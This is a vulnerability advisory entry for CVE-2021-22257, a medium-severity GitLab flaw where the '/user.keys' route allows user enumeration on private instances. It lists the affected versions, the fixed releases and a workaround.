PT-2021-14919 · Gitlab · Gitlab

Published

2021-10-05

Updated

2024-03-06

CVE-2021-22257

CVSS v3.1

5.3

Medium

Vector

AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Name of the Vulnerable Software and Affected Versions: GitLab versions 14.0 through 14.0.8 GitLab versions 14.1 through 14.1.3 GitLab versions 14.2 through 14.2.1

Description: An issue has been discovered in GitLab where the route for "/user.keys" is not restricted on instances with public visibility disabled, allowing user enumeration on such instances.

Recommendations: For versions 14.0 through 14.0.8, update to version 14.0.9 or later. For versions 14.1 through 14.1.3, update to version 14.1.4 or later. For versions 14.2 through 14.2.1, update to version 14.2.2 or later. As a temporary workaround, consider restricting access to the "/user.keys" endpoint until a patch is available.

Fix

Found an issue in the description? Have something to add? Feel free to write us 👾

dbugs@ptsecurity.com

Related Identifiers

BIT-GITLAB-2021-22257

CVE-2021-22257

Affected Products

Gitlab

PT-2021-14919 · Gitlab · Gitlab

CVE-2021-22257

Related Identifiers

Affected Products

References · 9